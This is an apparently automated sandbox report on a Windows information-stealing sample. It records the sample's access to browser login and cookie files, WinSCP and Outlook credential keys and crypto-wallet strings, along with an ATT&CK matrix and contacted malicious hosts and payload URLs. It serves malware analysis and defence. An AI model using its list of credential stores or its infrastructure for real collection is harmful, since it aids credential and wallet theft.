                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductIdJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeQueries volume information: C:\Users\user\Desktop\Mu7iyblZk8.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeQueries volume information: C:\Users\user\AppData\Roaming\WareHouse.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: Mu7iyblZk8.exe, 00000000.00000002.1404853569.0000000012C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC_config_file
                  Source: Mu7iyblZk8.exe, 00000000.00000002.1404853569.0000000012C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectronCash_config_file
                  Source: Mu7iyblZk8.exe, 00000000.00000002.1404853569.0000000012C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx LibertyAaiaifbiceejhhkfbjdgonjgljkpcdhch
                  Source: Mu7iyblZk8.exe, 00000000.00000002.1404853569.0000000012C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC_config_file
                  Source: Mu7iyblZk8.exe, 00000000.00000002.1404853569.0000000012C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus_directory
                  Source: Mu7iyblZk8.exe, 00000000.00000002.1404853569.0000000012C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum_directory
                  Source: Mu7iyblZk8.exe, 00000000.00000002.1404853569.0000000012C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: keystore
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\SecurityJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\SecurityJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara matchFile source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Mu7iyblZk8.exe.12c89ac0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Mu7iyblZk8.exe.12c89ac0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.3813836224.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.3816380121.0000000002814000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3816272759.0000000002C14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1404853569.0000000012C88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Mu7iyblZk8.exe PID: 7560, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7732, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 1272, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		133
                  System Information Discovery                  		Remote Services1
                  Archive Collected Data                  		2
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Native API                  		1
                  Scheduled Task/Job                  		311
                  Process Injection                  		2
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		211
                  Security Software Discovery                  		Remote Desktop Protocol2
                  Data from Local System                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job                  		Logon Script (Windows)1
                  Scheduled Task/Job                  		1
                  Software Packing                  		Security Account Manager1
                  Process Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  DLL Side-Loading                  		NTDS41
                  Virtualization/Sandbox Evasion                  		Distributed Component Object Model1
                  Clipboard Data                  		2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Masquerading                  		LSA Secrets1
                  Application Window Discovery                  		SSHKeylogging13
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts41
                  Virtualization/Sandbox Evasion                  		Cached Domain Credentials1
                  System Network Configuration Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
                  Process Injection                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483418 Sample: Mu7iyblZk8.exe Startdate: 27/07/2024 Architecture: WINDOWS Score: 100 50 ipinfo.io 2->50 52 investdirectinsurance.com 2->52 54 2 other IPs or domains 2->54 68 Multi AV Scanner detection for submitted file 2->68 70 .NET source code contains potential unpacker 2->70 72 .NET source code references suspicious native API functions 2->72 74 2 other signatures 2->74 9 Mu7iyblZk8.exe 17 2->9         started        14 WareHouse.exe 2->14         started        signatures3 process4 dnsIp5 56 investdirectinsurance.com 104.21.65.79, 443, 49706, 49707 CLOUDFLARENETUS United States 9->56 40 C:\Users\user\AppData\Roaming\WareHouse.exe, PE32 9->40 dropped 42 C:\Users\...\WareHouse.exe:Zone.Identifier, ASCII 9->42 dropped 44 C:\Users\user\AppData\...\Mu7iyblZk8.exe.log, CSV 9->44 dropped 76 Found many strings related to Crypto-Wallets (likely being stolen) 9->76 78 Writes to foreign memory regions 9->78 80 Allocates memory in foreign processes 9->80 16 MSBuild.exe 15 5 9->16         started        20 cmd.exe 1 9->20         started        82 Multi AV Scanner detection for dropped file 14->82 84 Injects a PE file into a foreign processes 14->84 22 MSBuild.exe 14->22         started        file6 signatures7 process8 dnsIp9 46 ipinfo.io 34.117.59.81, 443, 49708, 49712 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 16->46 48 45.94.31.188, 1237, 49709, 49713 GBTCLOUDUS Netherlands 16->48 58 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 16->58 60 Tries to steal Mail credentials (via file / registry access) 16->60 62 Switches to a custom stack to bypass stack traces 16->62 24 WMIC.exe 1 16->24         started        26 conhost.exe 16->26         started        64 Uses schtasks.exe or at.exe to add and modify task schedules 20->64 28 conhost.exe 20->28         started        30 schtasks.exe 1 20->30         started        66 Tries to harvest and steal browser information (history, passwords, etc) 22->66 32 WMIC.exe 22->32         started        34 conhost.exe 22->34         started        signatures10 process11 process12 36 conhost.exe 24->36         started        38 conhost.exe 32->38         started       

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Mu7iyblZk8.exe24%VirustotalBrowse
                  Mu7iyblZk8.exe37%ReversingLabsWin32.Trojan.Generic

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\WareHouse.exe37%ReversingLabsWin32.Trojan.Generic
                  C:\Users\user\AppData\Roaming\WareHouse.exe24%VirustotalBrowse

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  ipinfo.io0%VirustotalBrowse
                  fp2e7a.wpc.phicdn.net0%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://ipinfo.io/missingauth0%Avira URL Cloudsafe
                  https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd0%Avira URL Cloudsafe
                  https://investdirectinsurance.com/7f)0%Avira URL Cloudsafe
                  https://investdirectinsurance.com/assuence/litesolidCha/Miox.bd0%Avira URL Cloudsafe
                  https://investdirectinsurance.com/sf0%Avira URL Cloudsafe
                  https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd1%VirustotalBrowse
                  https://investdirectinsurance.com/0%Avira URL Cloudsafe
                  https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd~0%Avira URL Cloudsafe
                  https://investdirectinsurance.com/assuence/litesolidCha/Miox.bd1%VirustotalBrowse
                  https://investdirectinsurance.com/assuence/litesolidCha/Miox.bdY0%Avira URL Cloudsafe
                  https://collection.hubanalytics.io/0%Avira URL Cloudsafe
                  https://ipinfo.io/missingauth0%VirustotalBrowse
                  https://ipinfo.io/json0%Avira URL Cloudsafe
                  https://discord.com/api/v9/users/0%Avira URL Cloudsafe
                  https://collection.hubanalytics.io/0%VirustotalBrowse
                  https://ipinfo.io/json0%VirustotalBrowse
                  https://discord.com/api/v9/users/0%VirustotalBrowse
                  https://investdirectinsurance.com/1%VirustotalBrowse

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  ipinfo.io
                  		34.117.59.81
                  		truetrueunknown
                  investdirectinsurance.com
                  		104.21.65.79
                  		truefalse
                    		unknown
                    fp2e7a.wpc.phicdn.net
                    		192.229.221.95
                    		truefalseunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://investdirectinsurance.com/assuence/litesolidCha/Miox.bdfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ipinfo.io/jsontrue
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://ipinfo.io/missingauthMSBuild.exe, 00000003.00000002.3816380121.0000000002814000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.3816272759.0000000002C14000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://investdirectinsurance.com/7f)WareHouse.exe, 0000000A.00000002.1466432583.000000001BBB3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://investdirectinsurance.com/sfWareHouse.exe, 0000000A.00000002.1466432583.000000001BBB3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://investdirectinsurance.com/WareHouse.exe, 0000000A.00000002.1466432583.000000001BBCE000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd~Mu7iyblZk8.exe, 00000000.00000002.1404302143.0000000000DC3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMSBuild.exe, 00000003.00000002.3816380121.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.3816272759.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://investdirectinsurance.com/assuence/litesolidCha/Miox.bdYMu7iyblZk8.exe, 00000000.00000002.1410420003.000000001BC61000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://collection.hubanalytics.io/WareHouse.exe.0.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://discord.com/api/v9/users/Mu7iyblZk8.exe, 00000000.00000002.1404853569.0000000012C88000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.3816380121.0000000002814000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.3816272759.0000000002C14000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.3813836224.0000000000429000.00000040.00000400.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    34.117.59.81
                    		ipinfo.ioUnited States
                    		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGtrue
                    104.21.65.79
                    		investdirectinsurance.comUnited States
                    		13335CLOUDFLARENETUSfalse
                    45.94.31.188
                    		unknownNetherlands
                    		395800GBTCLOUDUSfalse

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1483418
                    Start date and time:2024-07-27 11:36:13 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 10m 54s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:19
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:Mu7iyblZk8.exe
                    renamed because original name is a hash value
                    Original Sample Name:efdac8eafdf875de010fe0a6980aad44b547c2a74430c185a28d67e98168c4b3.exe
                    Detection:MAL
                    Classification:mal100.spyw.evad.winEXE@19/10@2/3
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 98%
                    • Number of executed functions: 282
                    • Number of non-executed functions: 25
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded IPs from analysis (whitelisted): 13.85.23.86, 192.229.221.95, 52.165.164.15, 20.3.187.198, 40.68.123.157
                    • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report creation exceeded maximum time and may have missing disassembly code information.
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    05:37:16API Interceptor11620047x Sleep call for process: MSBuild.exe modified
                    05:37:17API Interceptor2x Sleep call for process: WMIC.exe modified
                    10:37:17Task SchedulerRun new task: WareHouse path: C:\Users\user\AppData\Roaming\WareHouse.exe

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    34.117.59.81mek_n_bat.batGet hashmaliciousUnknownBrowse
                    • ipinfo.io/json
                    QMe7JpPtde.exeGet hashmaliciousUnknownBrowse
                    • ipinfo.io/json
                    z30PO1028930.exeGet hashmaliciousAsyncRAT, StormKitty, VenomRATBrowse
                    • ipinfo.io/ip
                    SecuriteInfo.com.Win32.KeyloggerX-gen.20370.1036.exeGet hashmaliciousUnknownBrowse
                    • ipinfo.io/ip
                    SecuriteInfo.com.Win32.KeyloggerX-gen.20370.1036.exeGet hashmaliciousUnknownBrowse
                    • ipinfo.io/ip
                    IP-Grabber.ps1Get hashmaliciousUnknownBrowse
                    • ipinfo.io/ip
                    BadUsb.ps1Get hashmaliciousUnknownBrowse
                    • ipinfo.io/ip
                    ZmYfQBiw.exeGet hashmaliciousUnknownBrowse
                    • ipinfo.io/
                    jmdCh1Z3.exeGet hashmaliciousUnknownBrowse
                    • ipinfo.io/
                    wAFWKlU1.exeGet hashmaliciousUnknownBrowse
                    • ipinfo.io/
                    104.21.65.79Ycj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                      Ycj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                        SWIFT.exeGet hashmaliciousLokibotBrowse
                          SecuriteInfo.com.W32.Lokibot.N.gen.Eldorado.28246.8151.exeGet hashmaliciousLokibotBrowse

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            ipinfo.iod34e1p5zD2.exeGet hashmaliciousUnknownBrowse
                            • 34.117.59.81
                            Ycj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                            • 34.117.59.81
                            engine.ps1Get hashmaliciousUnknownBrowse
                            • 34.117.59.81
                            invoker.ps1Get hashmaliciousUnknownBrowse
                            • 34.117.59.81
                            tgmes.ps1Get hashmaliciousUnknownBrowse
                            • 34.117.59.81
                            x.ps1Get hashmaliciousUnknownBrowse
                            • 34.117.59.81
                            invoker.ps1Get hashmaliciousUnknownBrowse
                            • 34.117.59.81
                            locker.ps1Get hashmaliciousTrojanRansomBrowse
                            • 34.117.59.81
                            mek_n_bat.batGet hashmaliciousUnknownBrowse
                            • 34.117.59.81
                            zx.ps1Get hashmaliciousUnknownBrowse
                            • 34.117.59.81
                            fp2e7a.wpc.phicdn.netR86BRY7DdC.exeGet hashmaliciousSnake KeyloggerBrowse
                            • 192.229.221.95
                            d34e1p5zD2.exeGet hashmaliciousUnknownBrowse
                            • 192.229.221.95
                            41DLTjkmOm.exeGet hashmaliciousRemcosBrowse
                            • 192.229.221.95
                            Ycj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                            • 192.229.221.95
                            QUOTATION_JULQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 192.229.221.95
                            https://azadengg.com/MTQwOTk4NzcwMg==sfmaxWjJWdUxYQm5lQzA0TXpVMU1EZ3dNMmxtZUdOb1lYWmxlbkpwYzNoaGFYSmliM0p1TG1OdmJRPT0=&c=E,1,LZxP3HHb1f9qSYvI9qirqXkUUBAc_Lly3K7xLwNdfYOBECyaKUoAd-t3gcHqWT79cExKeBU56i8wGFRIGcXn5xtHq6aoS1GJuvxV76lYjLuWHw,,&typo=1Get hashmaliciousUnknownBrowse
                            • 192.229.221.95
                            x.ps1Get hashmaliciousUnknownBrowse
                            • 192.229.221.95
                            invoker.ps1Get hashmaliciousUnknownBrowse
                            • 192.229.221.95
                            http://investors.spotify.com.th.wuush.us.kg/Get hashmaliciousUnknownBrowse
                            • 192.229.221.95
                            http://investors.spotify.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                            • 192.229.221.95
                            investdirectinsurance.comYcj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                            • 104.21.65.79
                            R86BRY7DdC.exeGet hashmaliciousSnake KeyloggerBrowse
                            • 172.67.189.102
                            d34e1p5zD2.exeGet hashmaliciousUnknownBrowse
                            • 172.67.189.102
                            41DLTjkmOm.exeGet hashmaliciousRemcosBrowse
                            • 172.67.189.102
                            Ycj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                            • 104.21.65.79
                            SWIFT.exeGet hashmaliciousLokibotBrowse
                            • 104.21.65.79
                            SecuriteInfo.com.W32.Lokibot.N.gen.Eldorado.28246.8151.exeGet hashmaliciousLokibotBrowse
                            • 104.21.65.79

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            CLOUDFLARENETUSYcj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                            • 104.21.65.79
                            R86BRY7DdC.exeGet hashmaliciousSnake KeyloggerBrowse
                            • 172.67.189.102
                            d34e1p5zD2.exeGet hashmaliciousUnknownBrowse
                            • 172.67.189.102
                            QIKiV83Pkl.exeGet hashmaliciousDCRatBrowse
                            • 172.67.19.24
                            41DLTjkmOm.exeGet hashmaliciousRemcosBrowse
                            • 172.67.189.102
                            Ycj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                            • 104.21.65.79
                            rwsNDpQSKZ.exeGet hashmaliciousLummaCBrowse
                            • 188.114.97.3
                            QUOTATION_JULQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 188.114.96.3
